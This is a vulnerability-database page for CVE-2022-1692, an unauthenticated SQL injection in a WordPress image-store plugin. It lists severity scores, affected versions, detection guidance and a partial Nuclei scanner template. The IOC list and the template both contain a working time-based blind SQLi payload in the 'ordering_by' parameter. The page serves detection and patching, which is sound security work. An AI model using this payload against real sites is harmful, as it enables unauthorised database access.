CVE-2022-1692
published 2022-06-08CVE-2022-1692: The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL…
PriorityP268critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
10.36%
95.1th percentile
The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dwbooster | cp_image_store_with_slideshow | < 1.0.68 | 1.0.68 |
Detection & IOCsextracted from sources · hover to see the quote
url{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20
otherordering_by=post_title DESC,(SELECT 9143 FROM (SELECT(SLEEP(8)))cFAm)--
- →Detect time-based blind SQLi attempts against WordPress sites using the CP Image Store plugin by monitoring GET requests with 'ordering_by' query parameter containing SQL sleep payloads (SLEEP function) and response duration >= 8 seconds.
- →Confirm exploitation context by checking that the response body contains the string 'cpis_image=' alongside a 200 status code and the malicious ordering_by parameter.
- →The vulnerable parameter is 'ordering_by' in GET requests to pages embedding the [codepeople-image-store] shortcode; unauthenticated users can inject SQL via this parameter. ↗
- ·Vulnerability affects CP Image Store with Slideshow WordPress plugin versions before 1.0.68 only; patched in 1.0.68 and later. ↗
- ·The SQLi is only exploitable on pages where the [codepeople-image-store] shortcode is embedded; scanning must first discover such pages before attempting the injection. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
CP Image Store with Slideshow <= 1.0.67 - SQL Injection
nuclei·CVSS 9.8
CVE-2022-1692 [CRITICAL] CP Image Store with Slideshow <= 1.0.67 - SQL Injection
CP Image Store with Slideshow '
internal: true
extractors:
- type: regex
name: path
regex:
- 'https?://[^/]+(/[a-zA-Z0-9][^'
group: 1
internal: true
- method: GET
path:
- "{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20"
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'contains(body, "cpis_image=")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100d7b7e6a033a58e691b1ed9ab6d86ca6d1be42277ec98cb997f31c57f8d1a17ae02202a0e9265b8f43b69daafece755c6850925bc0470e293c81a587ab3fb46de3a7d:922c64590222798bb761d5b6d8e72950
2022-06-08
Published